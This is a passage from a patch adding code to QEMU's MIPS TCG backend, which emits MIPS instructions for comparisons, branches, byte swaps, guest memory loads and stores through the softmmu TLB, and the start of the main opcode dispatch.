tcg_out_opc_sa(s, OPC_SLL, TCG_TMP0, TCG_TMP0, 8); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + + tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); + tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP0, TCG_TMP0, 0xff00); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + } +} + +static inline void tcg_out_ext8s(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_SEB, ret, 0, arg); + } else { + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); + tcg_out_opc_sa(s, OPC_SRA, ret, ret, 24); + } +} + +static inline void tcg_out_ext16s(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_SEH, ret, 0, arg); + } else { + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 16); + tcg_out_opc_sa(s, OPC_SRA, ret, ret, 16); + } +} + +static void tcg_out_ldst(TCGContext *s, MIPSInsn opc, TCGReg data, + TCGReg addr, intptr_t ofs) +{ + int16_t lo = ofs; + if (ofs != lo) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, ofs - lo); + if (addr != TCG_REG_ZERO) { + tcg_out_opc_reg(s, OPC_ADDU, TCG_TMP0, TCG_TMP0, addr); + } + addr = TCG_TMP0; + } + tcg_out_opc_imm(s, opc, data, addr, lo); +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, OPC_LW, arg, arg1, arg2); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, OPC_SW, arg, arg1, arg2); +} + +static inline void tcg_out_addi(TCGContext *s, TCGReg reg, TCGArg val) +{ + if (val == (int16_t)val) { + tcg_out_opc_imm(s, OPC_ADDIU, reg, reg, val); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, val); + tcg_out_opc_reg(s, OPC_ADDU, reg, reg, TCG_TMP0); + } +} + +/* Bit 0 set if inversion required; bit 1 set if swapping required. */ +#define MIPS_CMP_INV 1 +#define MIPS_CMP_SWAP 2 + +static const uint8_t mips_cmp_map[16] = { + [TCG_COND_LT] = 0, + [TCG_COND_LTU] = 0, + [TCG_COND_GE] = MIPS_CMP_INV, + [TCG_COND_GEU] = MIPS_CMP_INV, + [TCG_COND_LE] = MIPS_CMP_INV | MIPS_CMP_SWAP, + [TCG_COND_LEU] = MIPS_CMP_INV | MIPS_CMP_SWAP, + [TCG_COND_GT] = MIPS_CMP_SWAP, + [TCG_COND_GTU] = MIPS_CMP_SWAP, +}; + +static void tcg_out_setcond(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg arg1, TCGReg arg2) +{ + MIPSInsn s_opc = OPC_SLTU; + int cmp_map; + + switch (cond) { + case TCG_COND_EQ: + if (arg2 != 0) { + tcg_out_opc_reg(s, OPC_XOR, ret, arg1, arg2); + arg1 = ret; + } + tcg_out_opc_imm(s, OPC_SLTIU, ret, arg1, 1); + break; + + case TCG_COND_NE: + if (arg2 != 0) { + tcg_out_opc_reg(s, OPC_XOR, ret, arg1, arg2); + arg1 = ret; + } + tcg_out_opc_reg(s, OPC_SLTU, ret, TCG_REG_ZERO, arg1); + break; + + case TCG_COND_LT: + case TCG_COND_GE: + case TCG_COND_LE: + case TCG_COND_GT: + s_opc = OPC_SLT; + /* FALLTHRU */ + + case TCG_COND_LTU: + case TCG_COND_GEU: + case TCG_COND_LEU: + case TCG_COND_GTU: + cmp_map = mips_cmp_map[cond]; + if (cmp_map & MIPS_CMP_SWAP) { + TCGReg t = arg1; + arg1 = arg2; + arg2 = t; + } + tcg_out_opc_reg(s, s_opc, ret, arg1, arg2); + if (cmp_map & MIPS_CMP_INV) { + tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1); + } + break; + + default: + tcg_abort(); + break; + } +} + +static void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGReg arg1, + TCGReg arg2, int label_index) +{ + static const MIPSInsn b_zero[16] = { + [TCG_COND_LT] = OPC_BLTZ, + [TCG_COND_GT] = OPC_BGTZ, + [TCG_COND_LE] = OPC_BLEZ, + [TCG_COND_GE] = OPC_BGEZ, + }; + + TCGLabel *l; + MIPSInsn s_opc = OPC_SLTU; + MIPSInsn b_opc; + int cmp_map; + + switch (cond) { + case TCG_COND_EQ: + b_opc = OPC_BEQ; + break; + case TCG_COND_NE: + b_opc = OPC_BNE; + break; + + case TCG_COND_LT: + case TCG_COND_GT: + case TCG_COND_LE: + case TCG_COND_GE: + if (arg2 == 0) { + b_opc = b_zero[cond]; + arg2 = arg1; + arg1 = 0; + break; + } + s_opc = OPC_SLT; + /* FALLTHRU */ + + case TCG_COND_LTU: + case TCG_COND_GTU: + case TCG_COND_LEU: + case TCG_COND_GEU: + cmp_map = mips_cmp_map[cond]; + if (cmp_map & MIPS_CMP_SWAP) { + TCGReg t = arg1; + arg1 = arg2; + arg2 = t; + } + tcg_out_opc_reg(s, s_opc, TCG_TMP0, arg1, arg2); + b_opc = (cmp_map & MIPS_CMP_INV ? OPC_BEQ : OPC_BNE); + arg1 = TCG_TMP0; + arg2 = TCG_REG_ZERO; + break; + + default: + tcg_abort(); + break; + } + + tcg_out_opc_br(s, b_opc, arg1, arg2); + l = &s->labels[label_index]; + if (l->has_value) { + reloc_pc16(s->code_ptr - 1, l->u.value_ptr); + } else { + tcg_out_reloc(s, s->code_ptr - 1, R_MIPS_PC16, label_index, 0); + } + tcg_out_nop(s); +} + +static TCGReg tcg_out_reduce_eq2(TCGContext *s, TCGReg tmp0, TCGReg tmp1, + TCGReg al, TCGReg ah, + TCGReg bl, TCGReg bh) +{ + /* Merge highpart comparison into AH. */ + if (bh != 0) { + if (ah != 0) { + tcg_out_opc_reg(s, OPC_XOR, tmp0, ah, bh); + ah = tmp0; + } else { + ah = bh; + } + } + /* Merge lowpart comparison into AL. */ + if (bl != 0) { + if (al != 0) { + tcg_out_opc_reg(s, OPC_XOR, tmp1, al, bl); + al = tmp1; + } else { + al = bl; + } + } + /* Merge high and low part comparisons into AL. */ + if (ah != 0) { + if (al != 0) { + tcg_out_opc_reg(s, OPC_OR, tmp0, ah, al); + al = tmp0; + } else { + al = ah; + } + } + return al; +} + +static void tcg_out_setcond2(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh) +{ + TCGReg tmp0 = TCG_TMP0; + TCGReg tmp1 = ret; + + assert(ret != TCG_TMP0); + if (ret == ah || ret == bh) { + assert(ret != TCG_TMP1); + tmp1 = TCG_TMP1; + } + + switch (cond) { + case TCG_COND_EQ: + case TCG_COND_NE: + tmp1 = tcg_out_reduce_eq2(s, tmp0, tmp1, al, ah, bl, bh); + tcg_out_setcond(s, cond, ret, tmp1, TCG_REG_ZERO); + break; + + default: + tcg_out_setcond(s, TCG_COND_EQ, tmp0, ah, bh); + tcg_out_setcond(s, tcg_unsigned_cond(cond), tmp1, al, bl); + tcg_out_opc_reg(s, OPC_AND, tmp1, tmp1, tmp0); + tcg_out_setcond(s, tcg_high_cond(cond), tmp0, ah, bh); + tcg_out_opc_reg(s, OPC_OR, ret, tmp1, tmp0); + break; + } +} + +static void tcg_out_brcond2(TCGContext *s, TCGCond cond, TCGReg al, TCGReg ah, + TCGReg bl, TCGReg bh, int label_index) +{ + TCGCond b_cond = TCG_COND_NE; + TCGReg tmp = TCG_TMP1; + + /* With branches, we emit between 4 and 9 insns with 2 or 3 branches. + With setcond, we emit between 3 and 10 insns and only 1 branch, + which ought to get better branch prediction. */ + switch (cond) { + case TCG_COND_EQ: + case TCG_COND_NE: + b_cond = cond; + tmp = tcg_out_reduce_eq2(s, TCG_TMP0, TCG_TMP1, al, ah, bl, bh); + break; + + default: + /* Minimize code size by preferring a compare not requiring INV. */ + if (mips_cmp_map[cond] & MIPS_CMP_INV) { + cond = tcg_invert_cond(cond); + b_cond = TCG_COND_EQ; + } + tcg_out_setcond2(s, cond, tmp, al, ah, bl, bh); + break; + } + + tcg_out_brcond(s, b_cond, tmp, TCG_REG_ZERO, label_index); +} + +static void tcg_out_movcond(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, TCGReg c2, TCGReg v) +{ + MIPSInsn m_opc = OPC_MOVN; + + switch (cond) { + case TCG_COND_EQ: + m_opc = OPC_MOVZ; + /* FALLTHRU */ + case TCG_COND_NE: + if (c2 != 0) { + tcg_out_opc_reg(s, OPC_XOR, TCG_TMP0, c1, c2); + c1 = TCG_TMP0; + } + break; + + default: + /* Minimize code size by preferring a compare not requiring INV. */ + if (mips_cmp_map[cond] & MIPS_CMP_INV) { + cond = tcg_invert_cond(cond); + m_opc = OPC_MOVZ; + } + tcg_out_setcond(s, cond, TCG_TMP0, c1, c2); + c1 = TCG_TMP0; + break; + } + + tcg_out_opc_reg(s, m_opc, ret, v, c1); +} + +static void tcg_out_call_int(TCGContext *s, tcg_insn_unit *arg, bool tail) +{ + /* Note that the ABI requires the called function's address to be + loaded into T9, even if a direct branch is in range. */ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T9, (uintptr_t)arg); + + /* But do try a direct branch, allowing the cpu better insn prefetch. */ + if (tail) { + if (!tcg_out_opc_jmp(s, OPC_J, arg)) { + tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_T9, 0); + } + } else { + if (!tcg_out_opc_jmp(s, OPC_JAL, arg)) { + tcg_out_opc_reg(s, OPC_JALR, TCG_REG_RA, TCG_REG_T9, 0); + } + } +} + +static void tcg_out_call(TCGContext *s, tcg_insn_unit *arg) +{ + tcg_out_call_int(s, arg, false); + tcg_out_nop(s); +} + +#if defined(CONFIG_SOFTMMU) +static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_SB] = helper_ret_ldsb_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LESW] = helper_le_ldsw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BESW] = helper_be_ldsw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BEQ] = helper_be_ldq_mmu, +}; + +static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, +}; + +/* Helper routines for marshalling helper function arguments into + * the correct registers and stack. + * I is where we want to put this argument, and is updated and returned + * for the next call. ARG is the argument itself. + * + * We provide routines for arguments which are: immediate, 32 bit + * value in register, 16 and 8 bit values in register (which must be zero + * extended before use) and 64 bit value in a lo:hi register pair. + */ + +static int tcg_out_call_iarg_reg(TCGContext *s, int i, TCGReg arg) +{ + if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { + tcg_out_mov(s, TCG_TYPE_REG, tcg_target_call_iarg_regs[i], arg); + } else { + tcg_out_st(s, TCG_TYPE_REG, arg, TCG_REG_SP, 4 * i); + } + return i + 1; +} + +static int tcg_out_call_iarg_reg8(TCGContext *s, int i, TCGReg arg) +{ + TCGReg tmp = TCG_TMP0; + if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { + tmp = tcg_target_call_iarg_regs[i]; + } + tcg_out_opc_imm(s, OPC_ANDI, tmp, arg, 0xff); + return tcg_out_call_iarg_reg(s, i, tmp); +} + +static int tcg_out_call_iarg_reg16(TCGContext *s, int i, TCGReg arg) +{ + TCGReg tmp = TCG_TMP0; + if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { + tmp = tcg_target_call_iarg_regs[i]; + } + tcg_out_opc_imm(s, OPC_ANDI, tmp, arg, 0xffff); + return tcg_out_call_iarg_reg(s, i, tmp); +} + +static int tcg_out_call_iarg_imm(TCGContext *s, int i, TCGArg arg) +{ + TCGReg tmp = TCG_TMP0; + if (arg == 0) { + tmp = TCG_REG_ZERO; + } else { + if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { + tmp = tcg_target_call_iarg_regs[i]; + } + tcg_out_movi(s, TCG_TYPE_REG, tmp, arg); + } + return tcg_out_call_iarg_reg(s, i, tmp); +} + +static int tcg_out_call_iarg_reg2(TCGContext *s, int i, TCGReg al, TCGReg ah) +{ + i = (i + 1) & ~1; + i = tcg_out_call_iarg_reg(s, i, (MIPS_BE ? ah : al)); + i = tcg_out_call_iarg_reg(s, i, (MIPS_BE ? al : ah)); + return i; +} + +/* Perform the tlb comparison operation. The complete host address is + placed in BASE. Clobbers AT, T0, A0. */ +static void tcg_out_tlb_load(TCGContext *s, TCGReg base, TCGReg addrl, + TCGReg addrh, int mem_index, TCGMemOp s_bits, + tcg_insn_unit *label_ptr[2], bool is_load) +{ + int cmp_off + = (is_load + ? offsetof(CPUArchState, tlb_table[mem_index][0].addr_read) + : offsetof(CPUArchState, tlb_table[mem_index][0].addr_write)); + int add_off = offsetof(CPUArchState, tlb_table[mem_index][0].addend); + + tcg_out_opc_sa(s, OPC_SRL, TCG_REG_A0, addrl, + TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); + tcg_out_opc_imm(s, OPC_ANDI, TCG_REG_A0, TCG_REG_A0, + (CPU_TLB_SIZE - 1) << CPU_TLB_ENTRY_BITS); + tcg_out_opc_reg(s, OPC_ADDU, TCG_REG_A0, TCG_REG_A0, TCG_AREG0); + + /* Compensate for very large offsets. */ + if (add_off >= 0x8000) { + /* Most target env are smaller than 32k; none are larger than 64k. + Simplify the logic here merely to offset by 0x7ff0, giving us a + range just shy of 64k. Check this assumption. */ + QEMU_BUILD_BUG_ON(offsetof(CPUArchState, + tlb_table[NB_MMU_MODES - 1][1]) + > 0x7ff0 + 0x7fff); + tcg_out_opc_imm(s, OPC_ADDIU, TCG_REG_A0, TCG_REG_A0, 0x7ff0); + cmp_off -= 0x7ff0; + add_off -= 0x7ff0; + } + + /* Load the tlb comparator. */ + tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, TCG_REG_A0, cmp_off + LO_OFF); + if (TARGET_LONG_BITS == 64) { + tcg_out_opc_imm(s, OPC_LW, base, TCG_REG_A0, cmp_off + HI_OFF); + } + + /* Mask the page bits, keeping the alignment bits to compare against. + In between, load the tlb addend for the fast path. */ + tcg_out_movi(s, TCG_TYPE_I32, TCG_TMP1, + TARGET_PAGE_MASK | ((1 << s_bits) - 1)); + tcg_out_opc_imm(s, OPC_LW, TCG_REG_A0, TCG_REG_A0, add_off); + tcg_out_opc_reg(s, OPC_AND, TCG_TMP1, TCG_TMP1, addrl); + + label_ptr[0] = s->code_ptr; + tcg_out_opc_br(s, OPC_BNE, TCG_TMP1, TCG_TMP0); + + if (TARGET_LONG_BITS == 64) { + /* delay slot */ + tcg_out_nop(s); + + label_ptr[1] = s->code_ptr; + tcg_out_opc_br(s, OPC_BNE, addrh, base); + } + + /* delay slot */ + tcg_out_opc_reg(s, OPC_ADDU, base, TCG_REG_A0, addrl); +} + +static void add_qemu_ldst_label(TCGContext *s, int is_ld, TCGMemOp opc, + TCGReg datalo, TCGReg datahi, + TCGReg addrlo, TCGReg addrhi, + int mem_index, void *raddr, + tcg_insn_unit *label_ptr[2]) +{ + TCGLabelQemuLdst *label = new_ldst_label(s); + + label->is_ld = is_ld; + label->opc = opc; + label->datalo_reg = datalo; + label->datahi_reg = datahi; + label->addrlo_reg = addrlo; + label->addrhi_reg = addrhi; + label->mem_index = mem_index; + label->raddr = raddr; + label->label_ptr[0] = label_ptr[0]; + if (TARGET_LONG_BITS == 64) { + label->label_ptr[1] = label_ptr[1]; + } +} + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l) +{ + TCGMemOp opc = l->opc; + TCGReg v0; + int i; + + /* resolve label address */ + reloc_pc16(l->label_ptr[0], s->code_ptr); + if (TARGET_LONG_BITS == 64) { + reloc_pc16(l->label_ptr[1], s->code_ptr); + } + + i = 1; + if (TARGET_LONG_BITS == 64) { + i = tcg_out_call_iarg_reg2(s, i, l->addrlo_reg, l->addrhi_reg); + } else { + i = tcg_out_call_iarg_reg(s, i, l->addrlo_reg); + } + i = tcg_out_call_iarg_imm(s, i, l->mem_index); + i = tcg_out_call_iarg_imm(s, i, (intptr_t)l->raddr); + tcg_out_call_int(s, qemu_ld_helpers[opc], false); + /* delay slot */ + tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); + + v0 = l->datalo_reg; + if ((opc & MO_SIZE) == MO_64) { + /* We eliminated V0 from the possible output registers, so it + cannot be clobbered here. So we must move V1 first. */ + if (MIPS_BE) { + tcg_out_mov(s, TCG_TYPE_I32, v0, TCG_REG_V1); + v0 = l->datahi_reg; + } else { + tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_V1); + } + } + + reloc_pc16(s->code_ptr, l->raddr); + tcg_out_opc_br(s, OPC_BEQ, TCG_REG_ZERO, TCG_REG_ZERO); + /* delay slot */ + tcg_out_mov(s, TCG_TYPE_REG, v0, TCG_REG_V0); +} + +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l) +{ + TCGMemOp opc = l->opc; + TCGMemOp s_bits = opc & MO_SIZE; + int i; + + /* resolve label address */ + reloc_pc16(l->label_ptr[0], s->code_ptr); + if (TARGET_LONG_BITS == 64) { + reloc_pc16(l->label_ptr[1], s->code_ptr); + } + + i = 1; + if (TARGET_LONG_BITS == 64) { + i = tcg_out_call_iarg_reg2(s, i, l->addrlo_reg, l->addrhi_reg); + } else { + i = tcg_out_call_iarg_reg(s, i, l->addrlo_reg); + } + switch (s_bits) { + case MO_8: + i = tcg_out_call_iarg_reg8(s, i, l->datalo_reg); + break; + case MO_16: + i = tcg_out_call_iarg_reg16(s, i, l->datalo_reg); + break; + case MO_32: + i = tcg_out_call_iarg_reg(s, i, l->datalo_reg); + break; + case MO_64: + i = tcg_out_call_iarg_reg2(s, i, l->datalo_reg, l->datahi_reg); + break; + default: + tcg_abort(); + } + i = tcg_out_call_iarg_imm(s, i, l->mem_index); + + /* Tail call to the store helper. Thus force the return address + computation to take place in the return address register. */ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_RA, (intptr_t)l->raddr); + i = tcg_out_call_iarg_reg(s, i, TCG_REG_RA); + tcg_out_call_int(s, qemu_st_helpers[opc], true); + /* delay slot */ + tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); +} +#endif + +static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, + TCGReg base, TCGMemOp opc) +{ + switch (opc) { + case MO_UB: + tcg_out_opc_imm(s, OPC_LBU, datalo, base, 0); + break; + case MO_SB: + tcg_out_opc_imm(s, OPC_LB, datalo, base, 0); + break; + case MO_UW | MO_BSWAP: + tcg_out_opc_imm(s, OPC_LHU, TCG_TMP1, base, 0); + tcg_out_bswap16(s, datalo, TCG_TMP1); + break; + case MO_UW: + tcg_out_opc_imm(s, OPC_LHU, datalo, base, 0); + break; + case MO_SW | MO_BSWAP: + tcg_out_opc_imm(s, OPC_LHU, TCG_TMP1, base, 0); + tcg_out_bswap16s(s, datalo, TCG_TMP1); + break; + case MO_SW: + tcg_out_opc_imm(s, OPC_LH, datalo, base, 0); + break; + case MO_UL | MO_BSWAP: + tcg_out_opc_imm(s, OPC_LW, TCG_TMP1, base, 0); + tcg_out_bswap32(s, datalo, TCG_TMP1); + break; + case MO_UL: + tcg_out_opc_imm(s, OPC_LW, datalo, base, 0); + break; + case MO_Q | MO_BSWAP: + tcg_out_opc_imm(s, OPC_LW, TCG_TMP1, base, HI_OFF); + tcg_out_bswap32(s, datalo, TCG_TMP1); + tcg_out_opc_imm(s, OPC_LW, TCG_TMP1, base, LO_OFF); + tcg_out_bswap32(s, datahi, TCG_TMP1); + break; + case MO_Q: + tcg_out_opc_imm(s, OPC_LW, datalo, base, LO_OFF); + tcg_out_opc_imm(s, OPC_LW, datahi, base, HI_OFF); + break; + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) +{ + TCGReg addr_regl, addr_regh QEMU_UNUSED_VAR; + TCGReg data_regl, data_regh; + TCGMemOp opc; +#if defined(CONFIG_SOFTMMU) + tcg_insn_unit *label_ptr[2]; + int mem_index; + TCGMemOp s_bits; +#endif + /* Note that we've eliminated V0 from the output registers, + so we won't overwrite the base register during loading. */ + TCGReg base = TCG_REG_V0; + + data_regl = *args++; + data_regh = (is_64 ? *args++ : 0); + addr_regl = *args++; + addr_regh = (TARGET_LONG_BITS == 64 ? *args++ : 0); + opc = *args++; + +#if defined(CONFIG_SOFTMMU) + mem_index = *args; + s_bits = opc & MO_SIZE; + + tcg_out_tlb_load(s, base, addr_regl, addr_regh, mem_index, + s_bits, label_ptr, 1); + tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc); + add_qemu_ldst_label(s, 1, opc, data_regl, data_regh, addr_regl, addr_regh, + mem_index, s->code_ptr, label_ptr); +#else + if (GUEST_BASE == 0 && data_regl != addr_regl) { + base = addr_regl; + } else if (GUEST_BASE == (int16_t)GUEST_BASE) { + tcg_out_opc_imm(s, OPC_ADDIU, base, addr_regl, GUEST_BASE); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, base, GUEST_BASE); + tcg_out_opc_reg(s, OPC_ADDU, base, base, addr_regl); + } + tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc); +#endif +} + +static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, + TCGReg base, TCGMemOp opc) +{ + switch (opc) { + case MO_8: + tcg_out_opc_imm(s, OPC_SB, datalo, base, 0); + break; + + case MO_16 | MO_BSWAP: + tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, datalo, 0xffff); + tcg_out_bswap16(s, TCG_TMP1, TCG_TMP1); + datalo = TCG_TMP1; + /* FALLTHRU */ + case MO_16: + tcg_out_opc_imm(s, OPC_SH, datalo, base, 0); + break; + + case MO_32 | MO_BSWAP: + tcg_out_bswap32(s, TCG_TMP1, datalo); + datalo = TCG_TMP1; + /* FALLTHRU */ + case MO_32: + tcg_out_opc_imm(s, OPC_SW, datalo, base, 0); + break; + + case MO_64 | MO_BSWAP: + tcg_out_bswap32(s, TCG_TMP1, datalo); + tcg_out_opc_imm(s, OPC_SW, TCG_TMP1, base, HI_OFF); + tcg_out_bswap32(s, TCG_TMP1, datahi); + tcg_out_opc_imm(s, OPC_SW, TCG_TMP1, base, LO_OFF); + break; + case MO_64: + tcg_out_opc_imm(s, OPC_SW, datalo, base, LO_OFF); + tcg_out_opc_imm(s, OPC_SW, datahi, base, HI_OFF); + break; + + default: + tcg_abort(); + } +} + +static void tcg_out_addsub2(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, + TCGReg ah, TCGArg bl, TCGArg bh, bool cbl, + bool cbh, bool is_sub) +{ + TCGReg th = TCG_TMP1; + + /* If we have a negative constant such that negating it would + make the high part zero, we can (usually) eliminate one insn. */ + if (cbl && cbh && bh == -1 && bl != 0) { + bl = -bl; + bh = 0; + is_sub = !is_sub; + } + + /* By operating on the high part first, we get to use the final + carry operation to move back from the temporary. */ + if (!cbh) { + tcg_out_opc_reg(s, (is_sub ? OPC_SUBU : OPC_ADDU), th, ah, bh); + } else if (bh != 0 || ah == rl) { + tcg_out_opc_imm(s, OPC_ADDIU, th, ah, (is_sub ? -bh : bh)); + } else { + th = ah; + } + + /* Note that tcg optimization should eliminate the bl == 0 case. */ + if (is_sub) { + if (cbl) { + tcg_out_opc_imm(s, OPC_SLTIU, TCG_TMP0, al, bl); + tcg_out_opc_imm(s, OPC_ADDIU, rl, al, -bl); + } else { + tcg_out_opc_reg(s, OPC_SLTU, TCG_TMP0, al, bl); + tcg_out_opc_reg(s, OPC_SUBU, rl, al, bl); + } + tcg_out_opc_reg(s, OPC_SUBU, rh, th, TCG_TMP0); + } else { + if (cbl) { + tcg_out_opc_imm(s, OPC_ADDIU, rl, al, bl); + tcg_out_opc_imm(s, OPC_SLTIU, TCG_TMP0, rl, bl); + } else { + tcg_out_opc_reg(s, OPC_ADDU, rl, al, bl); + tcg_out_opc_reg(s, OPC_SLTU, TCG_TMP0, rl, (rl == bl ? al : bl)); + } + tcg_out_opc_reg(s, OPC_ADDU, rh, th, TCG_TMP0); + } +} + +static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) +{ + TCGReg addr_regl, addr_regh QEMU_UNUSED_VAR; + TCGReg data_regl, data_regh, base; + TCGMemOp opc; +#if defined(CONFIG_SOFTMMU) + tcg_insn_unit *label_ptr[2]; + int mem_index; + TCGMemOp s_bits; +#endif + + data_regl = *args++; + data_regh = (is_64 ? *args++ : 0); + addr_regl = *args++; + addr_regh = (TARGET_LONG_BITS == 64 ? *args++ : 0); + opc = *args++; + +#if defined(CONFIG_SOFTMMU) + mem_index = *args; + s_bits = opc & 3; + + /* Note that we eliminated the helper's address argument, + so we can reuse that for the base. */ + base = (TARGET_LONG_BITS == 32 ? TCG_REG_A1 : TCG_REG_A2); + tcg_out_tlb_load(s, base, addr_regl, addr_regh, mem_index, + s_bits, label_ptr, 0); + tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); + add_qemu_ldst_label(s, 0, opc, data_regl, data_regh, addr_regl, addr_regh, + mem_index, s->code_ptr, label_ptr); +#else + if (GUEST_BASE == 0) { + base = addr_regl; + } else { + base = TCG_REG_A0; + if (GUEST_BASE == (int16_t)GUEST_BASE) { + tcg_out_opc_imm(s, OPC_ADDIU, base, addr_regl, GUEST_BASE); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, base, GUEST_BASE); + tcg_out_opc_reg(s, OPC_ADDU, base, base, addr_regl); + } + } + tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); +#endif +} + +static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg *args, const int *const_args) +{ + MIPSInsn i1, i2; + TCGArg a0, a1, a2; + int c2; + + a0 = args[0]; + a1 = args[1]; + a2 = args[2]; + c2 = const_args[2]; + + switch (opc) { + case INDEX_op_exit_tb: + { + TCGReg b0 = TCG_REG_ZERO; + + if (a0 & ~0xffff) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_V0, a0 & ~0xffff); + b0 = TCG_REG_V0; + } + if (!tcg_out_opc_jmp(s, OPC_J, tb_ret_addr)) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, + (uintptr_t)tb_ret_addr); + tcg_out_opc_reg(s, OPC_JR, 0, TCG_TMP0, 0); + } + tcg_out_opc_imm(s, OPC_ORI, TCG_REG_V0, b0, a0 & 0xffff); + } + break; + case INDEX_op_goto_tb: + if (s->tb_jmp_offset) { + /* direct jump method */ + s->tb_jmp_offset[a0] = tcg_current_code_size(s); + /* Avoid clobbering the address during retranslation. */ + tcg_out32(s, OPC_J | (*(uint32_t *)s->code_ptr & 0x3ffffff)); + } else { + /* indirect jump method */ + tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP0, TCG_REG_ZERO, + (uintptr_t)(s->tb_next + a0)); + tcg_out_opc_reg(s, OPC_JR, 0, TCG_TMP0, 0); + } + tcg_out_nop(s); + s->tb_next_offset[a0] = tcg_current_code_size(s); + break; + case INDEX_op_br: + tcg_out_brcond(s, TCG_COND_EQ, TCG_REG_ZERO, TCG_REG_ZERO, a0); + break; + + case INDEX_op_ld8u_i32: + i1 = OPC_LBU; + goto do_ldst; + case INDEX_op_ld8s_i32: + i1 = OPC_LB; + goto do_ldst; + case INDEX_op_ld16u_i32: + i1 = OPC_LHU; + goto do_ldst; + case INDEX_op_ld16s_i32: + i1 = OPC_LH; + goto do_ldst; + case INDEX_op_ld_i32: + i1 = OPC_LW; + goto do_ldst; + case INDEX_op_st8_i32: + i1 = OPC_SB; + goto do_ldst; + case INDEX_op_st16_i32: + i1 = OPC_SH; + goto do_ldst; + case INDEX_op_st_i32: + i1 = OPC_SW; + do_ldst: + tcg_out_ldst(s, i1, a0, a1, a2); + break; + + case INDEX_op_add_i32: + i1 = OPC_ADDU, i2 = OPC_ADDIU; + goto do_binary; + case INDEX_op_or_i32: + i1 = OPC_OR, i2 = OPC_ORI; + goto do_binary; + case INDEX_op_xor_i32: + i1 = OPC_XOR, i2 = OPC_XORI; + do_binary: + if (c2) { + tcg_out_opc_imm(s, i2, a0, a1, a2); + break; + } + do_binaryv: + tcg_out_opc_reg(s, i1, a0, a1, a2); + break; + + case INDEX_op_sub_i32: + if (c2) { + tcg_out_opc_imm(s, OPC_ADDIU, a0, a1, -a2); + break; + } + i1 = OPC_SUBU; + goto do_binary; + case INDEX_op_and_i32: + if (c2 && a2 != (uint16_t)a2) { + int msb = ctz32(~a2) - 1; + assert(use_mips32r2_instructions); + assert(is_p2m1(a2)); + tcg_out_opc_bf(s, OPC_EXT, a0, a1, msb, 0); + break; + } + i1 = OPC_AND, i2 = OPC_ANDI; + goto do_binary; + case INDEX_op_nor_i32: + i1 = OPC_NOR; + goto do_binaryv; + + case INDEX_op_mul_i32: + if (use_mips32_instructions) { + tcg_out_opc_reg(s, OPC_MUL, a0, a1, a2); + break; + } + i1 = OPC_MULT, i2 = OPC_MFLO; + goto do_hilo1; + case 